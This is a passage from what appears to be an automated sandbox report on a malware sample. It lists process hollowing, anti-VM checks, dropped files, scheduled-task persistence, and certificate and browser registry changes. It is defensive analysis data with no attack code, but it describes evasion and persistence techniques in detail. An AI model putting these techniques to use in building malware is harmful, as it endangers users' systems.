  File created  C:\Windows\system32\GroupPolicy\Machine\Registry.pol  cmd.exe
Suspicious use of SetThreadContext 9 IoCs
Four droppers hollow the .NET host AppLaunch.exe; PID 3012 (from 4LF780EA.exe) is the process whose memory matched family_redline above, and AppLaunch.exe is also the writer of the Defender policy values listed earlier.
Processes (pid  process  ->  target pid  target process):
  2996  1Iz10bE7.exe  ->  3804  AppLaunch.exe
  2544  2Hu0424.exe   ->  3908  AppLaunch.exe
  1012  4LF780EA.exe  ->  3012  AppLaunch.exe
  304   1Xf60zx0.exe  ->  5412  AppLaunch.exe
  5168  toolspub2.exe ->  5712  toolspub2.exe
  5792  8D0D.exe      ->  1364  ADelRCP.exe
  5628  AB44.exe      ->  6040  jsc.exe
  5604  updater.exe   ->  5732  conhost.exe
  5604  updater.exe   ->  5840  explorer.exe
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
Processes:
  File opened (read-only)  \??\VBoxMiniRdrDN  31839b57a4f11171d6abc8bbc4451ee4.exe
Drops file in Program Files directory 28 IoCs
Three writers: the Inno Setup stub is-OVUC4.tmp installs MyBurn; latestX.exe places updater.exe under C:\Program Files\Google\Chrome and updater.exe in turn writes WR64.sys under C:\Program Files\Google\Libs (neither path belongs to a Google product); vaxPtPs.exe drops DLL/XML pairs into randomly named directories and patches Firefox's omni.ja (keeping a .bak) after adding a .xpi to browser\features, the same process that drops the Chrome extensions above.
Processes:
  File created  C:\Program Files (x86)\MyBurn\is-LHCAN.tmp  is-OVUC4.tmp
  File created  C:\Program Files (x86)\MyBurn\is-97VCB.tmp  is-OVUC4.tmp
  File created  C:\Program Files (x86)\MyBurn\Sounds\is-71E0K.tmp  is-OVUC4.tmp
  File created  C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi  vaxPtPs.exe
  File opened for modification  C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi  vaxPtPs.exe
  File created  C:\Program Files (x86)\MyBurn\is-7C1NN.tmp  is-OVUC4.tmp
  File opened for modification  C:\Program Files (x86)\MyBurn\unins000.dat  is-OVUC4.tmp
  File created  C:\Program Files\Google\Libs\WR64.sys  updater.exe
  File created  C:\Program Files (x86)\oVhJPNkDU\pdqXAj.dll  vaxPtPs.exe
  File created  C:\Program Files\Mozilla Firefox\browser\omni.ja.bak  vaxPtPs.exe
  File created  C:\Program Files (x86)\DlbZONUGhjVU2\ayneOMs.xml  vaxPtPs.exe
  File created  C:\Program Files (x86)\KrPQunXfXpAVC\MOkOKDM.dll  vaxPtPs.exe
  File created  C:\Program Files (x86)\MyBurn\is-2B50N.tmp  is-OVUC4.tmp
  File created  C:\Program Files\Google\Chrome\updater.exe  latestX.exe
  File created  C:\Program Files (x86)\DlbZONUGhjVU2\lpbdoqIXbAWjc.dll  vaxPtPs.exe
  File created  C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\MeffiZk.xml  vaxPtPs.exe
  File created  C:\Program Files (x86)\KrPQunXfXpAVC\NsLzZct.xml  vaxPtPs.exe
  File created  C:\Program Files (x86)\GpfcWYRxKqUn\YvxqZuh.dll  vaxPtPs.exe
  File opened for modification  C:\Program Files (x86)\MyBurn\MyBurn.exe  is-OVUC4.tmp
  File opened for modification  C:\Program Files\Mozilla Firefox\browser\omni.ja  vaxPtPs.exe
  File created  C:\Program Files (x86)\MyBurn\unins000.dat  is-OVUC4.tmp
  File created  C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\waAdHuj.dll  vaxPtPs.exe
  File opened for modification  C:\Program Files\Mozilla Firefox\browser\omni.ja.bak  vaxPtPs.exe
  File created  C:\Program Files (x86)\oVhJPNkDU\oKlhKdZ.xml  vaxPtPs.exe
  File created  C:\Program Files (x86)\MyBurn\is-AKIV0.tmp  is-OVUC4.tmp
  File created  C:\Program Files (x86)\MyBurn\is-U2KCO.tmp  is-OVUC4.tmp
  File created  C:\Program Files (x86)\MyBurn\Sounds\is-GDIG8.tmp  is-OVUC4.tmp
  File created  C:\Program Files (x86)\MyBurn\is-2P6RO.tmp  is-OVUC4.tmp
Drops file in Windows directory 23 IoCs
Processes:
  File created  C:\Windows\rescache\_merged\3720402701\2219095117.pri  MicrosoftEdgeCP.exe  (12 entries, Edge resource cache)
  File created  C:\Windows\rescache\_merged\3720402701\2219095117.pri  MicrosoftEdge.exe
  File created  C:\Windows\windefender.exe  csrss.exe
  File opened for modification  C:\Windows\windefender.exe  csrss.exe
  File created  C:\Windows\rss\csrss.exe  31839b57a4f11171d6abc8bbc4451ee4.exe
  File opened for modification  C:\Windows\rss  31839b57a4f11171d6abc8bbc4451ee4.exe
  File created  C:\Windows\Tasks\ztlTbPYifermRZH.job  schtasks.exe
  File created  C:\Windows\Tasks\bwpFiyeZPJPVdaMxTt.job  schtasks.exe
  File created  C:\Windows\Tasks\GyWbuVQzPmDmgkCMH.job  schtasks.exe
  File created  C:\Windows\Tasks\HKFMMLmWpeGdwIqGl.job  schtasks.exe
  File opened for modification  C:\Windows\Wanugegulaho milorahaxah mosuraxupib rusekutokefod bopujune  515A.exe
  File opened for modification  C:\Windows\Debug\ESE.TXT  MicrosoftEdge.exe
Launches sc.exe 11 IoCs
sc.exe is a Windows utility to control services on the system.
Processes (pid  process):
  1100 sc.exe, 2668 sc.exe, 1988 sc.exe, 4208 sc.exe, 580 sc.exe, 4480 sc.exe,
  2604 sc.exe, 2812 sc.exe, 6064 sc.exe, 5156 sc.exe, 1136 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 4 IoCs
Processes (pid  process  ->  crashed pid  crashed process):
  3848  WerFault.exe  ->  3908  AppLaunch.exe
  5528  WerFault.exe  ->  5412  AppLaunch.exe
  3508  WerFault.exe  ->  4896  515A.exe
  1600  WerFault.exe  ->  1364  ADelRCP.exe
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
  Key queried     \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  toolspub2.exe
  Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  toolspub2.exe
  Key opened      \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  3Pp48oh.exe
  Key queried     \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  3Pp48oh.exe
  Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  3Pp48oh.exe
  Key opened      \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  toolspub2.exe
Creates scheduled task(s) 1 TTPs 14 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes (pid  process):
  304 schtasks.exe, 3248 schtasks.exe, 4192 schtasks.exe, 5784 schtasks.exe, 4444 schtasks.exe,
  1012 schtasks.exe, 3848 schtasks.exe, 1092 schtasks.exe, 1804 schtasks.exe, 700 schtasks.exe,
  5492 schtasks.exe, 168 schtasks.exe, 1000 schtasks.exe, 2936 schtasks.exe
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS  rundll32.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName  rundll32.exe
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS  Install.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName  Install.exe
Creates Internet Explorer\Main registry key 2 IoCs
Processes:
  Key created  \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000\Software\Microsoft\Internet Explorer\Main  MicrosoftEdgeCP.exe
  Key created  \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000\Software\Microsoft\Internet Explorer\Main  browser_broker.exe
Modifies data under HKEY_USERS 64 IoCs
Processes (rows without a process are shown as recorded; the list is cut off on this page):
  Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed  powershell.exe
  Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\  powershell.exe
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"  powershell.exe
  Set value (str)  \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time"  31839b57a4f11171d6abc8bbc4451ee4.exe
  Key created  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust
  Set value (str)  \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-171 = "Central Daylight Time (Mexico)"  windefender.exe
  Set value (str)  \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time"  31839b57a4f11171d6abc8bbc4451ee4.exe
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"  vaxPtPs.exe
  Set value (str)  \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-772 = "Montevideo Standard Time"  windefender.exe
  Set value (str)  \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1931 = "Russia TZ 11 Daylight Time"  windefender.exe
  Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\  powershell.exe
  Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs  powershell.exe
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{45ef689a-0000-0000-0000-d01200000000}\MaxCapacity = "14116"  vaxPtPs.exe
  Set value (str)  \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-335 = "Jordan Standard Time"  windefender.exe
  Set value (str)  \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-384 = "Namibia Daylight Time"  windefender.exe
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"
  Set value (str)  \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2141 = "Transbaikal Daylight Time"  windefender.exe
  Set value (str)  \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time"  31839b57a4f11171d6abc8bbc4451ee4.exe
  Set value (str)  \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1802 = "Line Islands Standard Time"  31839b57a4f11171d6abc8bbc4451ee4.exe
  Set value (str)  \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time"  31839b57a4f11171d6abc8bbc4451ee4.exe
  Key created  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs  powershell.exe
  Key created  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA  powershell.exe
  Set value (str)  \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time"  31839b57a4f11171d6abc8bbc4451ee4.exe
  Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs  reg.exe
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"  powershell.exe
  Set value (str)  \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-214 = "Pacific Daylight Time (Mexico)"  windefender.exe
  Set value (str)  \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-222 = "Alaskan Standard Time"  windefender.exe
  Set value (str)  \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-681 = "E. Australia Daylight Time"  windefender.exe
  Set value (str)  \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-361 = "GTB Daylight Time"  windefender.exe
  Key created  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs  powershell.exe
  Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates  powershell.exe
  Key created  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates  powershell.exe
  Key created  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA
  Set value (str)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"  rundll32.exe
  Set value (str)  \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1911 = "Russia TZ 10 Daylight Time"  windefender.exe
  Key created  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs  powershell.exe
  Key created  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople  powershell.exe
  Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates  powershell.exe
  Set value (str)  \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-251 = "Dateline Daylight Time"  windefender.exe
  Key created  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates  reg.exe
  Key created
\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1862 = "Russia TZ 6 Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created 
\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-602 = "Taipei Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-961 = "Paraguay Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe -
Modifies registry class 64 IoCs
Processes:
MicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exedescription ioc process Set value (data) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" MicrosoftEdge.exe Key created 
\REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\"" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = e4478dbdd006da01 MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 03c834c8d006da01 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0" 
MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = a74782bcd006da01 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 8e40c7b6d006da01 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local 
Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\Certificates MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy\ClearBrowsingHistoryOnStart = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\CRLs MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local 
Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root\CRLs MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames\ MicrosoftEdge.exe Key created 
\REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Key created 